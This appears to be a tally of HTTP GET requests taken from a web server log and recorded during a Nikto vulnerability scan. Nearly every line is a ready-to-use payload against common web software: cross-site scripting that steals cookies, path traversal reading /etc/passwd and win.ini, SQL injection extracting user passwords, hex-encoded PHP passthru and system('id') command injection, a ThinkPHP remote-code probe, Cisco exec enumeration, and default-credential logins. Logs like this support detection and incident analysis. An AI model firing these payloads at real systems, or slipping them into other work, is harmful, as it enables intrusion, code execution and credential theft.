1 GET /forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1
1 GET /forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22 HTTP/1.1
1 GET /forumdisplay.php?GLOBALS[]=1&f=2&comma=\\\".system('id').\\\" HTTP/1.1
1 GET /forums//adm/config.php HTTP/1.1
1 GET /forums//admin/config.php HTTP/1.1
1 GET /forums//administrator/config.php HTTP/1.1
1 GET /forums/ HTTP/1.1
1 GET /forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script> HTTP/1.1
1 GET /forums/config.php HTTP/1.1
1 GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /foto/ HTTP/1.1
1 GET /fotos/ HTTP/1.1
1 GET /fpadmin/ HTTP/1.1
1 GET /fpdb/shop.mdb HTTP/1.1
1 GET /friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /ftp/ HTTP/1.1
1 GET /gallery/search.php?searchstring=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /ganglia/ HTTP/1.1
1 GET /gb/index.php?login=true HTTP/1.1
1 GET /geeklog/users.php HTTP/1.1
1 GET /getaccess HTTP/1.1
1 GET /gfx/ HTTP/1.1
1 GET /global.asa HTTP/1.1
1 GET /global.inc HTTP/1.1
1 GET /global/ HTTP/1.1
1 GET /goform/CheckLogin?login=root&password=tslinux HTTP/1.1
1 GET /graphics/ HTTP/1.1
1 GET /guest/ HTTP/1.1
1 GET /guestbook.cgi HTTP/1.1
1 GET /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1
1 GET /guestbook/ HTTP/1.1
1 GET /guestbook/admin.php HTTP/1.1
1 GET /guestbook/admin/o12guest.mdb HTTP/1.1
1 GET /guestbook/guestbook.html HTTP/1.1
1 GET /guestbook/guestbookdat HTTP/1.1
1 GET /guestbook/pwd HTTP/1.1
1 GET /guests/ HTTP/1.1
1 GET /help.html HTTP/1.1
1 GET /help/ HTTP/1.1
1 GET /helpdesk.cgi HTTP/1.1
1 GET /hidden.nsf HTTP/1.1
1 GET /hidden/ HTTP/1.1
1 GET /hit_tracker/ HTTP/1.1
1 GET /hitmatic/ HTTP/1.1
1 GET /hitmatic/analyse.cgi HTTP/1.1
1 GET /hits.txt HTTP/1.1
1 GET /hmstat.htm HTTP/1.1
1 GET /hola/admin/cms/htmltags.php?datei=./sec/data.php HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.php?arsc_language=elvish HTTP/1.1
1 GET /home/ HTTP/1.1
2 GET /home HTTP/1.1
1 GET /homepage/ HTTP/1.1
1 GET /horde/imp/test.php HTTP/1.1
1 GET /horde/test.php?mode=phpinfo HTTP/1.1
1 GET /horde/test.php HTTP/1.1
1 GET /host-manager/ HTTP/1.1
1 GET /host-manager/contextAdmin/contextAdmin.html HTTP/1.1
2 GET /hostadmin/?page=' HTTP/1.1
5 GET /hp/device/this.LCDispatcher HTTP/1.1
1 GET /ht_root/wwwroot/-/local/httpd$map.conf HTTP/1.1
1 GET /htbin/ HTTP/1.1
1 GET /htdocs/ HTTP/1.1
1 GET /html/ HTTP/1.1
1 GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /html/cgi-bin/cgicso?query=AAA HTTP/1.1
1 GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.1
1 GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> HTTP/1.1
1 GET /htpasswd HTTP/1.1
1 GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> HTTP/1.1
1 GET /hyperstat/stat_what.log HTTP/1.1
1 GET /ibill/ HTTP/1.1
1 GET /icons/back.gif HTTP/1.1
1 GET /icons/blank.gif HTTP/1.1
1 GET /idea/ HTTP/1.1
1 GET /ideas/ HTTP/1.1
1 GET /iisadmin/ HTTP/1.1
1 GET /iisadmpwd/aexp2.htr HTTP/1.1
1 GET /iisadmpwd/aexp2b.htr HTTP/1.1
1 GET /iisadmpwd/aexp3.htr HTTP/1.1
1 GET /iisadmpwd/aexp4.htr HTTP/1.1
1 GET /iisadmpwd/aexp4b.htr HTTP/1.1
1 GET /iissamples/exair/search/query.asp HTTP/1.1
1 GET /iissamples/exair/search/search.asp HTTP/1.1
1 GET /iissamples/issamples/SQLQHit.asp HTTP/1.1
1 GET /iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.1
1 GET /iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full HTTP/1.1
1 GET /iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.1
1 GET /iissamples/issamples/sqlqhit.asp HTTP/1.1
1 GET /imagenes/ HTTP/1.1
1 GET /images HTTP/1.0
1 GET /img/ HTTP/1.1
1 GET /imgs/ HTTP/1.1
1 GET /imp/horde/test.php?mode=phpinfo HTTP/1.1
2 GET /imp/horde/test.php HTTP/1.1
1 GET /imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x HTTP/1.1
1 GET /import/ HTTP/1.1
1 GET /impreso/ HTTP/1.1
1 GET /inc/common.load.php HTTP/1.1
1 GET /inc/config.php HTTP/1.1
1 GET /inc/dbase.php HTTP/1.1
1 GET /include.php?path=contact.php&contact_email=\\\">&lt;script&gt;alert(document.cookie);&lt;/script&gt; HTTP/1.1
1 GET /includes/ HTTP/1.1
1 GET /incoming/ HTTP/1.1
2 GET /index.asp HTTP/1.1
2 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
2 GET /index.cgi HTTP/1.1
1 GET /index.do HTTP/1.1
1 GET /index.htm HTTP/1.1
1 GET /index.html%20 HTTP/1.1
1 GET /index.html.bak HTTP/1.1
2 GET /index.html HTTP/1.1
1 GET /index.html~ HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsp%00x HTTP/1.1
1 GET /index.php/123 HTTP/1.1
1 GET /index.php/\\\"><script><script>alert(document.cookie)</script>< HTTP/1.1
1 GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search HTTP/1.1
1 GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /index.php3 HTTP/1.1
1 GET /index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?|=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php? HTTP/1.1
1 GET /index.php?action=search&searchFor=\\\"><script>alert('Vulnerable')</script >
1 GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.1
1 GET /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc HTTP/1.1
1 GET /index.php?dir=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /index.php?download=/etc/passwd HTTP/1.1
1 GET /index.php?download=/windows/win.ini HTTP/1.1
1 GET /index.php?download=/winnt/win.ini HTTP/1.1
1 GET /index.php?err=3&email=\\\"><script>alert(document.cookie)</script> HTTP/1.1
1 GET /index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.1
1 GET /index.php?file=index.php HTTP/1.1
1 GET /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* HTTP/1.1
1 GET /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd HTTP/1.1
1 GET /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc HTTP/1.1
2 GET /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
2 GET /index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
2 GET /index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /index.php?offset=[%20Problem%20Here%20] HTTP/1.1
1 GET /index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.1
1 GET /index.php?page=../../../../../../../../../../boot.ini HTTP/1.1
1 GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /index.php?rep=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere] HTTP/1.1
1 GET /index.php?sql_debug=1 HTTP/1.1
1 GET /index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1
1 GET /index.php?vo=\\\"><script>alert(document.cookie);</script> HTTP/1.1
3 GET /index.php HTTP/1.1
2 GET /index.pl HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /index.xml HTTP/1.1
1 GET /index HTTP/1.1
1 GET /info.cgi HTTP/1.1
1 GET /info.sh HTTP/1.1
1 GET /info/ HTTP/1.1
1 GET /informacion/ HTTP/1.1
1 GET /information/ HTTP/1.1
1 GET /ingresa/ HTTP/1.1
1 GET /ingreso/ HTTP/1.1
1 GET /install/ HTTP/1.1
1 GET /instantwebmail/message.php HTTP/1.1
1 GET /internal/ HTTP/1.1
1 GET /interscan/ HTTP/1.1
1 GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.1
1 GET /intranet/ HTTP/1.1
1 GET /invitado/ HTTP/1.1
1 GET /invitados/ HTTP/1.1
1 GET /ip.txt HTTP/1.1
1 GET /isapi/count.pl? HTTP/1.1
1 GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> HTTP/1.1
1 GET /isx.html HTTP/1.1
1 GET /jYzVUElnBa HTTP/1.1
1 GET /jamdb/ HTTP/1.1
1 GET /java-plugin/ HTTP/1.1
1 GET /java/ HTTP/1.1
1 GET /jdbc/ HTTP/1.1
1 GET /jgb_eng_php3/cfooter.php3 HTTP/1.1
1 GET /jigsaw/ HTTP/1.1
1 GET /jk-manager/ HTTP/1.1
1 GET /jk-manager/contextAdmin/contextAdmin.html HTTP/1.1
1 GET /jk-status/ HTTP/1.1
1 GET /jk-status/contextAdmin/contextAdmin.html HTTP/1.1
1 GET /job/ HTTP/1.1
1 GET /jrun/ HTTP/1.1
1 GET /js HTTP/1.1
1 GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini HTTP/1.1
1 GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini HTTP/1.1
1 GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd HTTP/1.1
1 GET /junk.aspx HTTP/1.1
1 GET /junk988.aspx HTTP/1.1
1 GET /junk999.asp HTTP/1.1
1 GET /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor HTTP/1.1
1 GET /kboard/ HTTP/1.1
1 GET /krysalis/ HTTP/1.1
1 GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /lcgi/lcgitest.nlm HTTP/1.1
1 GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.1
1 GET /level/16/exec/-///pwd HTTP/1.1
1 GET /level/16/exec/-///show/configuration HTTP/1.1
1 GET /level/16/exec//show/access-lists HTTP/1.1
1 GET /level/16/exec//show HTTP/1.1
1 GET /level/16/exec/ HTTP/1.1
1 GET /level/16/level/16/exec//show/configuration HTTP/1.1
1 GET /level/16/level/16/exec//show/interfaces/status HTTP/1.1
1 GET /level/16/level/16/exec//show/interfaces HTTP/1.1
1 GET /level/16/level/16/exec//show/running-config/interface/FastEthernet HTTP/1.1
1 GET /level/16/level/16/exec//show/version HTTP/1.1
1 GET /level/16 HTTP/1.1
1 GET /level/17/exec//show HTTP/1.1
1 GET /level/18/exec//show HTTP/1.1
1 GET /level/19/exec//show HTTP/1.1
1 GET /level/20/exec//show HTTP/1.1
1 GET /level/21/exec//show HTTP/1.1
1 GET /level/22/exec//show HTTP/1.1
1 GET /level/23/exec//show HTTP/1.1
1 GET /level/24/exec//show HTTP/1.1
1 GET /level/25/exec//show HTTP/1.1
1 GET /level/26/exec//show HTTP/1.1
1 GET /level/27/exec//show HTTP/1.1
1 GET /level/28/exec//show HTTP/1.1
1 GET /level/29/exec//show HTTP/1.1
1 GET /level/30/exec//show HTTP/1.1
1 GET /level/31/exec//show HTTP/1.1
1 GET /level/32/exec//show HTTP/1.1
1 GET /level/33/exec//show HTTP/1.1
1 GET /level/34/exec//show HTTP/1.1
1 GET /level/35/exec//show HTTP/1.1
1 GET /level/36/exec//show HTTP/1.1
1 GET /level/37/exec//show HTTP/1.1
1 GET /level/38/exec//show HTTP/1.1
1 GET /level/39/exec//show HTTP/1.1
1 GET /level/40/exec//show HTTP/1.1
1 GET /level/41/exec//show HTTP/1.1
1 GET /level/42/exec//show HTTP/1.1
1 GET /level/42/exec/show%20conf HTTP/1.1
1 GET /level/43/exec//show HTTP/1.1
1 GET /level/44/exec//show HTTP/1.1
1 GET /level/45/exec//show HTTP/1.1
1 GET /level/46/exec//show HTTP/1.1
1 GET /level/47/exec//show HTTP/1.1
1 GET /level/48/exec//show HTTP/1.1
1 GET /level/49/exec//show HTTP/1.1
1 GET /level/50/exec//show HTTP/1.1
1 GET /level/51/exec//show HTTP/1.1
1 GET /level/52/exec//show HTTP/1.1
1 GET /level/53/exec//show HTTP/1.1
1 GET /level/54/exec//show HTTP/1.1
1 GET /level/55/exec//show HTTP/1.1
1 GET /level/56/exec//show HTTP/1.1
1 GET /level/57/exec//show HTTP/1.1
1 GET /level/58/exec//show HTTP/1.1
1 GET /level/59/exec//show HTTP/1.1
1 GET /level/60/exec//show HTTP/1.1
1 GET /level/61/exec//show HTTP/1.1
1 GET /level/62/exec//show HTTP/1.1
1 GET /level/63/exec//show HTTP/1.1
1 GET /level/64/exec//show HTTP/1.1
1 GET /level/65/exec//show HTTP/1.1
1 GET /level/66/exec//show HTTP/1.1
1 GET /level/67/exec//show HTTP/1.1
1 GET /level/68/exec//show HTTP/1.1
1 GET /level/69/exec//show HTTP/1.1
1 GET /level/70/exec//show HTTP/1.1
1 GET /level/71/exec//show HTTP/1.1
1 GET /level/72/exec//show HTTP/1.1
1 GET /level/73/exec//show HTTP/1.1
1 GET /level/74/exec//show HTTP/1.1
1 GET /level/75/exec//show HTTP/1.1
1 GET /level/76/exec//show HTTP/1.1
1 GET /level/77/exec//show HTTP/1.1
1 GET /level/78/exec//show HTTP/1.1
1 GET /level/79/exec//show HTTP/1.1
1 GET /level/80/exec//show HTTP/1.1
1 GET /level/81/exec//show HTTP/1.1
1 GET /level/82/exec//show HTTP/1.1
1 GET /level/83/exec//show HTTP/1.1
1 GET /level/84/exec//show HTTP/1.1
1 GET /level/85/exec//show HTTP/1.1
1 GET /level/86/exec//show HTTP/1.1
1 GET /level/87/exec//show HTTP/1.1
1 GET /level/88/exec//show HTTP/1.1
1 GET /level/89/exec//show HTTP/1.1
1 GET /level/90/exec//show HTTP/1.1
1 GET /level/91/exec//show HTTP/1.1
1 GET /level/92/exec//show HTTP/1.1
1 GET /level/93/exec//show HTTP/1.1
1 GET /level/94/exec//show HTTP/1.1
1 GET /level/95/exec//show HTTP/1.1
1 GET /level/96/exec//show HTTP/1.1
1 GET /level/97/exec//show HTTP/1.1
1 GET /level/98/exec//show HTTP/1.1
1 GET /level/99/exec//show HTTP/1.1
1 GET /lib/ HTTP/1.1
1 GET /library/ HTTP/1.1
1 GET /libro/ HTTP/1.1
1 GET /linux/ HTTP/1.1
1 GET /lists/admin/ HTTP/1.1
1 GET /livehelp/ HTTP/1.1
1 GET /loadpage.cgi HTTP/1.1
1 GET /local/httpd$map.conf HTTP/1.1
1 GET /log.htm HTTP/1.1
1 GET /log.html HTTP/1.1
1 GET /log.nsf HTTP/1.1
1 GET /log.txt HTTP/1.1
1 GET /logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
1 GET /logfile.htm HTTP/1.1
1 GET /logfile.html HTTP/1.1
1 GET /logfile.txt HTTP/1.1
1 GET /logfile/ HTTP/1.1
1 GET /logfile HTTP/1.1
1 GET /logfiles/ HTTP/1.1
1 GET /logger.html HTTP/1.1
1 GET /logger/ HTTP/1.1
1 GET /logging/ HTTP/1.1
1 GET /logicworks.ini HTTP/1.1
1 GET /login.asp HTTP/1.1
1 GET /login.aspx HTTP/1.1
1 GET /login.cgi HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /login.php HTTP/1.1
1 GET /login.pl HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /logins.html HTTP/1.1
1 GET /logjam/showhits.php HTTP/1.1
1 GET /logs.txt HTTP/1.1
1 GET /logs/ HTTP/1.1
1 GET /logs/access_log HTTP/1.1
1 GET /logs/error_log HTTP/1.1
1 GET /logs/str_err.log HTTP/1.1
1 GET /lost+found/ HTTP/1.1
1 GET /lpt9.xtp HTTP/1.1
1 GET /lpt9 HTTP/1.1
1 GET /mail.box HTTP/1.1
1 GET /mail/ HTTP/1.1
1 GET /mailman/admin/ml-name?\\\"><script>alert('Vulnerable')</script>; HTTP/1.1
1 GET /mailman/listinfo/<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /mailman/listinfo HTTP/1.1
1 GET /mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.1
1 GET /main_page.php HTTP/1.1
1 GET /mall_log_files/order.log HTTP/1.1
1 GET /mambo/administrator/phpinfo.php HTTP/1.1
1 GET /mambo/index.php?Itemid=7SAqE HTTP/1.1
1 GET /manage/cgi/cgiproc HTTP/1.1
2 GET /manager/ HTTP/1.1
1 GET /manager/contextAdmin/contextAdmin.html HTTP/1.1
1 GET /manager HTTP/1.1
1 GET /manual.php HTTP/1.1
1 GET /marketing/ HTTP/1.1
1 GET /master.password HTTP/1.1
1 GET /mbox HTTP/1.1
1 GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /megabook/files/20/setup.db HTTP/1.1
1 GET /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22 HTTP/1.1
1 GET /members/ HTTP/1.1
1 GET /message/ HTTP/1.1
1 GET /messaging/ HTTP/1.1
1 GET /midicart.mdb HTTP/1.1
1 GET /ministats/admin.cgi HTTP/1.1
1 GET /misc/ HTTP/1.1
1 GET /mkstats/ HTTP/1.1
1 GET /mods/apage/apage.cgi?f=file.htm.|id| HTTP/1.1
1 GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index HTTP/1.1
1 GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> HTTP/1.1
2 GET /modules.php?name=Downloads&d_op=viewdownload HTTP/1.1
1 GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?name=Members_List&sql_debug=1 HTTP/1.1
1 GET /modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1
1 GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test HTTP/1.1
1 GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> HTTP/1.1
1 GET /modules.php?op=modload&name=0&file=0 HTTP/1.1
1 GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0 HTTP/1.1
1 GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+> HTTP/1.1
1 GET /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script> HTTP/1.1
1 GET /modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>; HTTP/1.1
1 GET /modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid= HTTP/1.1
1 GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink HTTP/1.1
1 GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 HTTP/1.1
1 GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| HTTP/1.1
1 GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules/Forums/bb_smilies.php?bgcolor1=\\\"><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> HTTP/1.1
1 GET /modules/My_eGallery/public/displayCategory.php HTTP/1.1
1 GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> HTTP/1.1
1 GET /modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
1 GET /modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 HTTP/1.1
